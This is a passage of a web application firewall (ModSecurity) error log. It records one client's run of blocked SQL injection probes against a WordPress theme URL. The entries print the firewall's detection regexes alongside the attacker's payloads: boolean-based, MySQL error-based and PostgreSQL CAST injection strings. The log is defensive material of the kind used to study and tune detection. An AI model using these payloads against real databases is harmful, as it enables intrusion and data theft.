"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5331= found within ARGS:ver: 1.8.5.47 AND 5331=3050"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1j2m8LEssXUq6wJ2LIAAAAJU"] [Sat Aug 31 01:17:51.629053 2024] [:error] [pid 9366:tid 140590352119552] [client 193.29.13.20:37618] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47 AND 3137=3137"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1jw1VuGGNTxm_kiOEmQAAANA"] [Sat Aug 31 01:17:51.936622 2024] [:error] [pid 8676:tid 140590531704576] [client 193.29.13.20:37620] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 9562= found within ARGS:ver: 1.8.5.47') AND 9562=2347 AND ('MGKM'='MGKM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1j2m8LEssXUq6wJ2LIQAAAIM"] [Sat Aug 31 01:17:52.251951 2024] [:error] [pid 8676:tid 140590343726848] [client 193.29.13.20:37622] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47') AND 3137=3137 AND ('Bmjy'='Bmjy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kGm8LEssXUq6wJ2LIgAAAJE"] [Sat Aug 31 01:17:52.558229 2024] [:error] [pid 8676:tid 140590335334144] [client 193.29.13.20:37624] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 9087= found within ARGS:ver: 1.8.5.47' AND 9087=9080 AND 'pKTL'='pKTL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kGm8LEssXUq6wJ2LIwAAAJI"] [Sat Aug 31 01:17:52.886042 2024] [:error] [pid 8676:tid 140590301763328] [client 193.29.13.20:37626] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47' AND 3137=3137 AND 'bcRC'='bcRC"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kGm8LEssXUq6wJ2LJAAAAJY"] [Sat Aug 31 01:17:53.218329 2024] [:error] [pid 8676:tid 140590385690368] [client 193.29.13.20:37628] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4601= found within ARGS:ver: 1.8.5.47%' AND 4601=7400 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kWm8LEssXUq6wJ2LJQAAAIw"] [Sat Aug 31 01:17:53.521983 2024] [:error] [pid 9366:tid 140590548489984] [client 193.29.13.20:37630] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47%' AND 3137=3137 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kQ1VuGGNTxm_kiOEmgAAAME"] [Sat Aug 31 01:17:53.829276 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:37632] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4011= found within ARGS:ver: 1.8.5.47 AND 4011=9809-- HOUm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kQ1VuGGNTxm_kiOEmwAAANY"] [Sat Aug 31 01:17:54.161342 2024] [:error] [pid 8672:tid 140590452832000] [client 193.29.13.20:37634] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47 AND 3137=3137-- StQh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kg3r8UJC0kxJCKSq4QAAAAQ"] [Sat Aug 31 01:17:54.478055 2024] [:error] [pid 8675:tid 140590556882688] [client 193.29.13.20:37636] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kpdLCjsWrLhZKAOZaQAAAEA"] [Sat Aug 31 01:17:54.788458 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:37638] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kg1VuGGNTxm_kiOEnAAAAM0"] [Sat Aug 31 01:17:55.100948 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37642] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47) AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4742=4742"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kw1VuGGNTxm_kiOEnQAAAMo"] [Sat Aug 31 01:17:55.410956 2024] [:error] [pid 9366:tid 140590310156032] [client 193.29.13.20:37644] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47 AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kw1VuGGNTxm_kiOEngAAANU"] [Sat Aug 31 01:17:55.729042 2024] [:error] [pid 8672:tid 140590548489984] [client 193.29.13.20:37646] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47') AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IkwF'='IkwF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1kw3r8UJC0kxJCKSq4gAAAAE"] [Sat Aug 31 01:17:56.053203 2024] [:error] [pid 8675:tid 140590368904960] [client 193.29.13.20:37648] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47' AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YeoT'='YeoT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lJdLCjsWrLhZKAOZagAAAE4"] [Sat Aug 31 01:17:56.364272 2024] [:error] [pid 8672:tid 140590310156032] [client 193.29.13.20:37650] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47%' AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lA3r8UJC0kxJCKSq4wAAABU"] [Sat Aug 31 01:17:56.668580 2024] [:error] [pid 8672:tid 140590343726848] [client 193.29.13.20:37652] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: 1.8.5.47 AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(6279=6279,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- kQmu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lA3r8UJC0kxJCKSq5AAAABE"] [Sat Aug 31 01:17:56.972693 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:37654] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC) AND (8042=8042"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lA1VuGGNTxm_kiOEnwAAAM4"] [Sat Aug 31 01:17:57.266345 2024] [:error] [pid 8672:tid 140590377297664] [client 193.29.13.20:37656] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lQ3r8UJC0kxJCKSq5QAAAA0"] [Sat Aug 31 01:17:57.591640 2024] [:error] [pid 9366:tid 140590343726848] [client 193.29.13.20:37658] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC) AND ('QTcv'='QTcv"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lQ1VuGGNTxm_kiOEoAAAANE"] [Sat Aug 31 01:17:57.924063 2024] [:error] [pid 9366:tid 140590293370624] [client 193.29.13.20:37660] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC) AND 'iHwg'='iHwg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lQ1VuGGNTxm_kiOEoQAAANc"] [Sat Aug 31 01:17:58.259518 2024] [:error] [pid 9366:tid 140590360512256] [client 193.29.13.20:37662] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). 